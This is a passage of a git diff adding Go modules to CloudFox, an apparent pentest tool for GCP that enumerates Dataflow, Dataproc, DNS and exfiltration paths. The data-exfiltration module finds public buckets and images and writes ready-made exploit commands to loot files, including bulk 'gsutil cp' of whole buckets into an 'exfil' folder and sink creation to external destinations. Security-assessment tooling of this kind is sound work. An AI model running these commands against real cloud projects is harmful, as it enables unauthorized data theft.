isPublic := false + accessLevel := "" + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if member == "allUsers" { + isPublic = true + accessLevel = "public" + break + } + if member == "allAuthenticatedUsers" { + isPublic = true + accessLevel = "allAuthenticatedUsers" + break + } + } + } + + if isPublic { + export := PublicExport{ + ResourceType: "image", + ResourceName: image.Name, + ProjectID: projectID, + AccessLevel: accessLevel, + DataType: "vm_image", + Size: fmt.Sprintf("%d GB", image.DiskSizeGb), + RiskLevel: "CRITICAL", + } + + path := ExfiltrationPath{ + PathType: "image", + ResourceName: image.Name, + ProjectID: projectID, + Description: fmt.Sprintf("Public VM image (%d GB)", image.DiskSizeGb), + Destination: "Anyone on the internet", + RiskLevel: "CRITICAL", + RiskReasons: []string{"VM image is publicly accessible", "May contain embedded credentials or sensitive data"}, + ExploitCommand: fmt.Sprintf( + "# Create instance from public image\n"+ + "gcloud compute instances create exfil-vm --image=projects/%s/global/images/%s --zone=us-central1-a", + projectID, image.Name), + } + + m.mu.Lock() + m.PublicExports = append(m.PublicExports, export) + m.ExfiltrationPaths = append(m.ExfiltrationPaths, path) + m.addExfiltrationPathToLoot(path) + m.mu.Unlock() + } + } + return nil + }) + + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not list images in project %s", projectID)) + } +} + +// findPublicBuckets finds GCS buckets with public access +func (m *DataExfiltrationModule) findPublicBuckets(ctx context.Context, projectID string, logger internal.Logger) { + storageService, err := storage.NewService(ctx) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not create Storage service in project %s", projectID)) + return + } + + // List buckets + resp, err := storageService.Buckets.List(projectID).Do() + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not list buckets in project %s", projectID)) + return + } + + for _, bucket := range resp.Items { + // Get IAM policy for bucket + policy, err := storageService.Buckets.GetIamPolicy(bucket.Name).Do() + if err != nil { + continue + } + + // Check for public access + isPublic := false + accessLevel := "" + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if member == "allUsers" { + isPublic = true + accessLevel = "public" + break + } + if member == "allAuthenticatedUsers" { + isPublic = true + accessLevel = "allAuthenticatedUsers" + break + } + } + } + + if isPublic { + export := PublicExport{ + ResourceType: "bucket", + ResourceName: bucket.Name, + ProjectID: projectID, + AccessLevel: accessLevel, + DataType: "gcs_bucket", + RiskLevel: "CRITICAL", + } + + path := ExfiltrationPath{ + PathType: "bucket", + ResourceName: bucket.Name, + ProjectID: projectID, + Description: "Public GCS bucket", + Destination: "Anyone on the internet", + RiskLevel: "CRITICAL", + RiskReasons: []string{"Bucket is publicly accessible", "May contain sensitive files"}, + ExploitCommand: fmt.Sprintf( + "# List public bucket contents\n"+ + "gsutil ls -r gs://%s/\n"+ + "# Download all files\n"+ + "gsutil -m cp -r gs://%s/ ./exfil/", + bucket.Name, bucket.Name), + } + + m.mu.Lock() + m.PublicExports = append(m.PublicExports, export) + m.ExfiltrationPaths = append(m.ExfiltrationPaths, path) + m.addExfiltrationPathToLoot(path) + m.mu.Unlock() + } + } +} + +// findLoggingSinks finds logging sinks that export to external destinations +func (m *DataExfiltrationModule) findLoggingSinks(ctx context.Context, projectID string, logger internal.Logger) { + // Common exfiltration patterns via logging sinks + // This would require the Logging API to be called + // For now, we'll add known exfiltration patterns + + path := ExfiltrationPath{ + PathType: "logging_sink", + ResourceName: "cross-project-sink", + ProjectID: projectID, + Description: "Logging sinks can export logs to external projects or Pub/Sub topics", + Destination: "External project or Pub/Sub topic", + RiskLevel: "MEDIUM", + RiskReasons: []string{"Logs may contain sensitive information", "External destination may be attacker-controlled"}, + ExploitCommand: fmt.Sprintf( + "# List logging sinks\n"+ + "gcloud logging sinks list --project=%s\n"+ + "# Create sink to external destination\n"+ + "# gcloud logging sinks create exfil-sink --project=%s", + projectID, projectID), + } + + m.mu.Lock() + m.ExfiltrationPaths = append(m.ExfiltrationPaths, path) + m.mu.Unlock() +} + +// analyzeExfiltrationVectors analyzes potential exfiltration methods +func (m *DataExfiltrationModule) analyzeExfiltrationVectors(ctx context.Context, projectID string, logger internal.Logger) { + // Common exfiltration vectors in GCP + vectors := []ExfiltrationPath{ + { + PathType: "bigquery_export", + ResourceName: "*", + ProjectID: projectID, + Description: "BigQuery datasets can be exported to GCS or queried directly", + Destination: "GCS bucket or external table", + RiskLevel: "MEDIUM", + RiskReasons: []string{"BigQuery may contain sensitive data", "Export destination may be accessible"}, + ExploitCommand: fmt.Sprintf( + "# List BigQuery datasets\n"+ + "bq ls --project_id=%s\n"+ + "# Export table to GCS\n"+ + "bq extract --destination_format=CSV 'dataset.table' gs://bucket/export.csv", + projectID), + }, + { + PathType: "pubsub_subscription", + ResourceName: "*", + ProjectID: projectID, + Description: "Pub/Sub push subscriptions can send data to external endpoints", + Destination: "External HTTP endpoint", + RiskLevel: "HIGH", + RiskReasons: []string{"Push subscriptions send data to configured endpoints", "Endpoint may be attacker-controlled"}, + ExploitCommand: fmt.Sprintf( + "# List Pub/Sub topics and subscriptions\n"+ + "gcloud pubsub topics list --project=%s\n"+ + "gcloud pubsub subscriptions list --project=%s", + projectID, projectID), + }, + { + PathType: "cloud_functions", + ResourceName: "*", + ProjectID: projectID, + Description: "Cloud Functions can be used to exfiltrate data via HTTP", + Destination: "External HTTP endpoint", + RiskLevel: "HIGH", + RiskReasons: []string{"Functions can make outbound HTTP requests", "Can access internal resources and exfiltrate data"}, + ExploitCommand: fmt.Sprintf( + "# List Cloud Functions\n"+ + "gcloud functions list --project=%s", + projectID), + }, + } + + m.mu.Lock() + m.ExfiltrationPaths = append(m.ExfiltrationPaths, vectors...) + for _, v := range vectors { + m.addExfiltrationPathToLoot(v) + } + m.mu.Unlock() +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *DataExfiltrationModule) initializeLootFiles() { + m.LootMap["data-exfiltration-commands"] = &internal.LootFile{ + Name: "data-exfiltration-commands", + Contents: "# Data Exfiltration Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization!\n\n", + } +} + +// formatExfilType converts internal type names to user-friendly display names +func formatExfilType(pathType string) string { + typeMap := map[string]string{ + "snapshot": "Disk Snapshot", + "image": "VM Image", + "bucket": "Storage Bucket", + "bigquery_export": "BigQuery Export", + "pubsub_subscription": "Pub/Sub Subscription", + "cloud_functions": "Cloud Function", + "logging_sink": "Logging Sink", + } + if friendly, ok := typeMap[pathType]; ok { + return friendly + } + return pathType +} + +func (m *DataExfiltrationModule) addExfiltrationPathToLoot(path ExfiltrationPath) { + if path.ExploitCommand == "" { + return + } + + // Add to consolidated commands file with description + m.LootMap["data-exfiltration-commands"].Contents += fmt.Sprintf( + "## %s: %s (Project: %s)\n"+ + "# %s\n"+ + "# Destination: %s\n", + formatExfilType(path.PathType), + path.ResourceName, + path.ProjectID, + path.Description, + path.Destination, + ) + + // Add exploit commands + m.LootMap["data-exfiltration-commands"].Contents += fmt.Sprintf("%s\n\n", path.ExploitCommand) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *DataExfiltrationModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Single merged table for all exfiltration paths + header := []string{ + "Project ID", + "Project Name", + "Resource", + "Type", + "Destination", + "Public", + "Size", + } + + var body [][]string + + // Track which resources we've added from PublicExports to avoid duplicates + publicResources := make(map[string]PublicExport) + for _, e := range m.PublicExports { + key := fmt.Sprintf("%s:%s:%s", e.ProjectID, e.ResourceType, e.ResourceName) + publicResources[key] = e + } + + // Add exfiltration paths + for _, p := range m.ExfiltrationPaths { + // Check if this is also in public exports + key := fmt.Sprintf("%s:%s:%s", p.ProjectID, p.PathType, p.ResourceName) + publicExport, isPublic := publicResources[key] + + publicStatus := "No" + size := "-" + if isPublic { + publicStatus = "Yes" + size = publicExport.Size + // Remove from map so we don't add it again + delete(publicResources, key) + } + + body = append(body, []string{ + p.ProjectID, + m.GetProjectName(p.ProjectID), + p.ResourceName, + formatExfilType(p.PathType), + p.Destination, + publicStatus, + size, + }) + } + + // Add any remaining public exports not already covered + for _, e := range publicResources { + body = append(body, []string{ + e.ProjectID, + m.GetProjectName(e.ProjectID), + e.ResourceName, + formatExfilType(e.ResourceType), + "Public access", + "Yes", + e.Size, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization!\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{} + + if len(body) > 0 { + tables = append(tables, internal.TableFile{ + Name: "data-exfiltration", + Header: header, + Body: body, + }) + } + + output := DataExfiltrationOutput{ + Table: tables, + Loot: lootFiles, + } + + // Build scope names with project names + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_DATAEXFILTRATION_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/dataflow.go b/gcp/commands/dataflow.go new file mode 100644 index 00000000..d67efd20 --- /dev/null +++ b/gcp/commands/dataflow.go @@ -0,0 +1,197 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + dataflowservice "github.com/BishopFox/cloudfox/gcp/services/dataflowService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPDataflowCommand = &cobra.Command{ + Use: globals.GCP_DATAFLOW_MODULE_NAME, + Aliases: []string{"df", "pipelines"}, + Short: "Enumerate Dataflow jobs and pipelines", + Long: `Enumerate Dataflow jobs with security analysis. + +Features: +- Lists all Dataflow jobs (batch and streaming) +- Shows service account configuration +- Identifies network exposure (public IPs) +- Analyzes temp/staging storage locations +- Detects default service account usage`, + Run: runGCPDataflowCommand, +} + +type DataflowModule struct { + gcpinternal.BaseGCPModule + Jobs []dataflowservice.JobInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type DataflowOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o DataflowOutput) TableFiles() []internal.TableFile { return o.Table } +func (o DataflowOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPDataflowCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_DATAFLOW_MODULE_NAME) + if err != nil { + return + } + + module := &DataflowModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Jobs: []dataflowservice.JobInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *DataflowModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_DATAFLOW_MODULE_NAME, m.processProject) + + if len(m.Jobs) == 0 { + logger.InfoM("No Dataflow jobs found", globals.GCP_DATAFLOW_MODULE_NAME) + return + } + + // Count by state + running := 0 + publicIPs := 0 + for _, job := range m.Jobs { + if job.State == "JOB_STATE_RUNNING" { + running++ + } + if job.UsePublicIPs { + publicIPs++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d Dataflow job(s) (%d running, %d with public IPs)", + len(m.Jobs), running, publicIPs), globals.GCP_DATAFLOW_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *DataflowModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Dataflow in project: %s", projectID), globals.GCP_DATAFLOW_MODULE_NAME) + } + + svc := dataflowservice.New() + jobs, err := svc.ListJobs(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_DATAFLOW_MODULE_NAME, + fmt.Sprintf("Could not list Dataflow jobs in project %s", projectID)) + return + } + + m.mu.Lock() + m.Jobs = append(m.Jobs, jobs...) + for _, job := range jobs { + m.addToLoot(job) + } + m.mu.Unlock() +} + +func (m *DataflowModule) initializeLootFiles() { + m.LootMap["dataflow-commands"] = &internal.LootFile{ + Name: "dataflow-commands", + Contents: "# Dataflow Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *DataflowModule) addToLoot(job dataflowservice.JobInfo) { + m.LootMap["dataflow-commands"].Contents += fmt.Sprintf( + "## Job: %s (Project: %s, Location: %s)\n"+ + "# ID: %s\n"+ + "# Type: %s\n"+ + "# State: %s\n"+ + "# Service Account: %s\n"+ + "# Public IPs: %v\n"+ + "# Workers: %d\n\n"+ + "# Describe job:\n"+ + "gcloud dataflow jobs describe %s --project=%s --region=%s\n"+ + "# Show job details:\n"+ + "gcloud dataflow jobs show %s --project=%s --region=%s\n"+ + "# Cancel job (if running):\n"+ + "gcloud dataflow jobs cancel %s --project=%s --region=%s\n\n", + job.Name, job.ProjectID, job.Location, + job.ID, + job.Type, + job.State, + job.ServiceAccount, + job.UsePublicIPs, + job.NumWorkers, + job.ID, job.ProjectID, job.Location, + job.ID, job.ProjectID, job.Location, + job.ID, job.ProjectID, job.Location, + ) +} + +func (m *DataflowModule) writeOutput(ctx context.Context, logger internal.Logger) { + header := []string{ + "Project ID", + "Project Name", + "Name", + "Type", + "State", + "Location", + "Service Account", + "Public IPs", + "Workers", + } + + var body [][]string + for _, job := range m.Jobs { + publicIPs := "No" + if job.UsePublicIPs { + publicIPs = "Yes" + } + + body = append(body, []string{ + job.ProjectID, + m.GetProjectName(job.ProjectID), + job.Name, + job.Type, + job.State, + job.Location, + job.ServiceAccount, + publicIPs, + fmt.Sprintf("%d", job.NumWorkers), + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{{Name: "dataflow", Header: header, Body: body}} + + output := DataflowOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_DATAFLOW_MODULE_NAME) + } +} diff --git a/gcp/commands/dataproc.go b/gcp/commands/dataproc.go new file mode 100644 index 00000000..ae6fdfdf --- /dev/null +++ b/gcp/commands/dataproc.go @@ -0,0 +1,242 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + dataprocservice "github.com/BishopFox/cloudfox/gcp/services/dataprocService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPDataprocCommand = &cobra.Command{ + Use: globals.GCP_DATAPROC_MODULE_NAME, + Aliases: []string{"dp", "hadoop", "spark"}, + Short: "Enumerate Dataproc clusters", + Long: `Enumerate Dataproc (Hadoop/Spark) clusters. + +Features: +- Lists all Dataproc clusters across regions +- Shows service account configuration +- Identifies public IP exposure +- Checks for Kerberos authentication +- Analyzes security configurations`, + Run: runGCPDataprocCommand, +} + +type DataprocModule struct { + gcpinternal.BaseGCPModule + Clusters []dataprocservice.ClusterInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type DataprocOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o DataprocOutput) TableFiles() []internal.TableFile { return o.Table } +func (o DataprocOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPDataprocCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_DATAPROC_MODULE_NAME) + if err != nil { + return + } + + module := &DataprocModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Clusters: []dataprocservice.ClusterInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *DataprocModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_DATAPROC_MODULE_NAME, m.processProject) + + if len(m.Clusters) == 0 { + logger.InfoM("No Dataproc clusters found", globals.GCP_DATAPROC_MODULE_NAME) + return + } + + runningCount := 0 + publicCount := 0 + for _, cluster := range m.Clusters { + if cluster.State == "RUNNING" { + runningCount++ + } + if !cluster.InternalIPOnly { + publicCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d Dataproc cluster(s) (%d running, %d with public IPs)", + len(m.Clusters), runningCount, publicCount), globals.GCP_DATAPROC_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *DataprocModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Dataproc in project: %s", projectID), globals.GCP_DATAPROC_MODULE_NAME) + } + + svc := dataprocservice.New() + + clusters, err := svc.ListClusters(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_DATAPROC_MODULE_NAME, + fmt.Sprintf("Could not list Dataproc clusters in project %s", projectID)) + return + } + + m.mu.Lock() + m.Clusters = append(m.Clusters, clusters...) + for _, cluster := range clusters { + m.addToLoot(cluster) + } + m.mu.Unlock() +} + +func (m *DataprocModule) initializeLootFiles() { + m.LootMap["dataproc-commands"] = &internal.LootFile{ + Name: "dataproc-commands", + Contents: "# Dataproc Commands\n# Generated by CloudFox\n\n", + } +} + +func (m *DataprocModule) addToLoot(cluster dataprocservice.ClusterInfo) { + m.LootMap["dataproc-commands"].Contents += fmt.Sprintf( + "# %s (%s)\n"+ + "# Project: %s\n", + cluster.Name, cluster.Region, + cluster.ProjectID, + ) + + // gcloud commands + m.LootMap["dataproc-commands"].Contents += fmt.Sprintf( + "gcloud dataproc clusters describe %s --region=%s --project=%s\n"+ + "gcloud dataproc jobs list --cluster=%s --region=%s --project=%s\n", + cluster.Name, cluster.Region, cluster.ProjectID, + cluster.Name, cluster.Region, cluster.ProjectID, + ) + + // Bucket commands + if cluster.ConfigBucket != "" { + m.LootMap["dataproc-commands"].Contents += fmt.Sprintf( + "gsutil ls gs://%s/\n", + cluster.ConfigBucket, + ) + } + if cluster.TempBucket != "" { + m.LootMap["dataproc-commands"].Contents += fmt.Sprintf( + "gsutil ls gs://%s/\n", + cluster.TempBucket, + ) + } + + m.LootMap["dataproc-commands"].Contents += "\n" +} + +func (m *DataprocModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Single table with one row per IAM binding + header := []string{ + "Project Name", + "Project ID", + "Name", + "Region", + "State", + "Master", + "Master Instances", + "Workers", + "Service Account", + "Public IPs", + "Kerberos", + "IAM Role", + "IAM Member", + } + + var body [][]string + for _, cluster := range m.Clusters { + sa := cluster.ServiceAccount + if sa == "" { + sa = "(default)" + } + + masterConfig := fmt.Sprintf("%s x%d", cluster.MasterMachineType, cluster.MasterCount) + workerConfig := fmt.Sprintf("%s x%d", cluster.WorkerMachineType, cluster.WorkerCount) + + // Master instances + masterInstances := "-" + if len(cluster.MasterInstanceNames) > 0 { + masterInstances = strings.Join(cluster.MasterInstanceNames, ", ") + } + + // If cluster has IAM bindings, create one row per binding + if len(cluster.IAMBindings) > 0 { + for _, binding := range cluster.IAMBindings { + body = append(body, []string{ + m.GetProjectName(cluster.ProjectID), + cluster.ProjectID, + cluster.Name, + cluster.Region, + cluster.State, + masterConfig, + masterInstances, + workerConfig, + sa, + boolToYesNo(!cluster.InternalIPOnly), + boolToYesNo(cluster.KerberosEnabled), + binding.Role, + binding.Member, + }) + } + } else { + // Cluster has no IAM bindings - single row + body = append(body, []string{ + m.GetProjectName(cluster.ProjectID), + cluster.ProjectID, + cluster.Name, + cluster.Region, + cluster.State, + masterConfig, + masterInstances, + workerConfig, + sa, + boolToYesNo(!cluster.InternalIPOnly), + boolToYesNo(cluster.KerberosEnabled), + "-", + "-", + }) + } + } + + tables := []internal.TableFile{{Name: "dataproc-clusters", Header: header, Body: body}} + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := DataprocOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_DATAPROC_MODULE_NAME) + } +} diff --git a/gcp/commands/dns.go b/gcp/commands/dns.go new file mode 100644 index 00000000..9efb9b06 --- /dev/null +++ b/gcp/commands/dns.go @@ -0,0 +1,357 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + DNSService "github.com/BishopFox/cloudfox/gcp/services/dnsService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPDNSCommand = &cobra.Command{ + Use: globals.GCP_DNS_MODULE_NAME, + Aliases: []string{"zones", "cloud-dns"}, + Short: "Enumerate Cloud DNS zones and records with security analysis", + Long: `Enumerate Cloud DNS managed zones and records across projects. + +Features: +- Lists all DNS managed zones (public and private) +- Shows zone configuration (DNSSEC, visibility, peering) +- Enumerates DNS records for each zone +- Identifies interesting records (A, CNAME, TXT, MX) +- Shows private zone VPC bindings +- Generates gcloud commands for DNS management + +Security Columns: +- Visibility: public or private +- DNSSEC: Whether DNSSEC is enabled +- Networks: VPC networks for private zones +- Peering: Cross-project DNS peering + +Attack Surface: +- Public zones expose domain infrastructure +- TXT records may contain sensitive info (SPF, DKIM, verification) +- Private zones indicate internal network structure +- DNS forwarding may expose internal resolvers`, + Run: runGCPDNSCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type DNSModule struct { + gcpinternal.BaseGCPModule + + Zones []DNSService.ZoneInfo + Records []DNSService.RecordInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type DNSOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o DNSOutput) TableFiles() []internal.TableFile { return o.Table } +func (o DNSOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPDNSCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_DNS_MODULE_NAME) + if err != nil { + return + } + + module := &DNSModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Zones: []DNSService.ZoneInfo{}, + Records: []DNSService.RecordInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *DNSModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_DNS_MODULE_NAME, m.processProject) + + if len(m.Zones) == 0 { + logger.InfoM("No DNS zones found", globals.GCP_DNS_MODULE_NAME) + return + } + + // Count zone types + publicCount := 0 + privateCount := 0 + for _, zone := range m.Zones { + if zone.Visibility == "public" { + publicCount++ + } else { + privateCount++ + } + } + + msg := fmt.Sprintf("Found %d zone(s), %d record(s)", len(m.Zones), len(m.Records)) + if publicCount > 0 { + msg += fmt.Sprintf(" [%d public]", publicCount) + } + if privateCount > 0 { + msg += fmt.Sprintf(" [%d private]", privateCount) + } + logger.SuccessM(msg, globals.GCP_DNS_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *DNSModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating DNS in project: %s", projectID), globals.GCP_DNS_MODULE_NAME) + } + + ds := DNSService.New() + + // Get zones + zones, err := ds.Zones(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_DNS_MODULE_NAME, + fmt.Sprintf("Could not enumerate DNS zones in project %s", projectID)) + return + } + + m.mu.Lock() + m.Zones = append(m.Zones, zones...) + + for _, zone := range zones { + m.addZoneToLoot(zone) + + // Get records for each zone + records, err := ds.Records(projectID, zone.Name) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_DNS_MODULE_NAME, + fmt.Sprintf("Could not enumerate DNS records in zone %s", zone.Name)) + continue + } + + m.Records = append(m.Records, records...) + for _, record := range records { + m.addRecordToLoot(record, zone) + } + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d zone(s) in project %s", len(zones), projectID), globals.GCP_DNS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *DNSModule) initializeLootFiles() { + m.LootMap["dns-commands"] = &internal.LootFile{ + Name: "dns-commands", + Contents: "# Cloud DNS Commands\n# Generated by CloudFox\n\n", + } +} + +func (m *DNSModule) addZoneToLoot(zone DNSService.ZoneInfo) { + m.LootMap["dns-commands"].Contents += fmt.Sprintf( + "# %s (%s)\n"+ + "# Project: %s | Visibility: %s\n", + zone.Name, zone.DNSName, + zone.ProjectID, zone.Visibility, + ) + + // gcloud commands + m.LootMap["dns-commands"].Contents += fmt.Sprintf( + "gcloud dns managed-zones describe %s --project=%s\n"+ + "gcloud dns record-sets list --zone=%s --project=%s\n", + zone.Name, zone.ProjectID, + zone.Name, zone.ProjectID, + ) + + m.LootMap["dns-commands"].Contents += "\n" +} + +func (m *DNSModule) addRecordToLoot(record DNSService.RecordInfo, zone DNSService.ZoneInfo) { + // Records are displayed in the table, no separate loot needed +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *DNSModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Zones table with IAM bindings (one row per IAM binding) + zonesHeader := []string{ + "Project Name", + "Project ID", + "Zone Name", + "DNS Name", + "Visibility", + "DNSSEC", + "Networks/Peering", + "Forwarding", + "IAM Role", + "IAM Member", + } + + var zonesBody [][]string + for _, zone := range m.Zones { + // Format DNSSEC + dnssec := zone.DNSSECState + if dnssec == "" { + dnssec = "off" + } + + // Format networks/peering + networkInfo := "-" + if len(zone.PrivateNetworks) > 0 { + networkInfo = strings.Join(zone.PrivateNetworks, ", ") + } else if zone.PeeringNetwork != "" { + networkInfo = fmt.Sprintf("Peering: %s", zone.PeeringNetwork) + if zone.PeeringTargetProject != "" { + networkInfo += fmt.Sprintf(" (%s)", zone.PeeringTargetProject) + } + } + + // Format forwarding + forwarding := "-" + if len(zone.ForwardingTargets) > 0 { + forwarding = strings.Join(zone.ForwardingTargets, ", ") + } + + // If zone has IAM bindings, create one row per binding + if len(zone.IAMBindings) > 0 { + for _, binding := range zone.IAMBindings { + zonesBody = append(zonesBody, []string{ + m.GetProjectName(zone.ProjectID), + zone.ProjectID, + zone.Name, + zone.DNSName, + zone.Visibility, + dnssec, + networkInfo, + forwarding, + binding.Role, + binding.Member, + }) + } + } else { + // Zone has no IAM bindings - single row + zonesBody = append(zonesBody, []string{ + m.GetProjectName(zone.ProjectID), + zone.ProjectID, + zone.Name, + zone.DNSName, + zone.Visibility, + dnssec, + networkInfo, + forwarding, + "-", + "-", + }) + } + } + + // Records table (interesting types only, no truncation) + recordsHeader := []string{ + "Zone", + "Name", + "Type", + "TTL", + "Data", + } + + var recordsBody [][]string + interestingTypes := map[string]bool{"A": true, "AAAA": true, "CNAME": true, "MX": true, "TXT": true, "SRV": true} + for _, record := range m.Records { + if !interestingTypes[record.Type] { + continue + } + + // Format data - no truncation + data := strings.Join(record.RRDatas, ", ") + + recordsBody = append(recordsBody, []string{ + record.ZoneName, + record.Name, + record.Type, + fmt.Sprintf("%d", record.TTL), + data, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build table files + tableFiles := []internal.TableFile{} + + if len(zonesBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_DNS_MODULE_NAME + "-zones", + Header: zonesHeader, + Body: zonesBody, + }) + } + + if len(recordsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_DNS_MODULE_NAME + "-records", + Header: recordsHeader, + Body: recordsBody, + }) + } + + output := 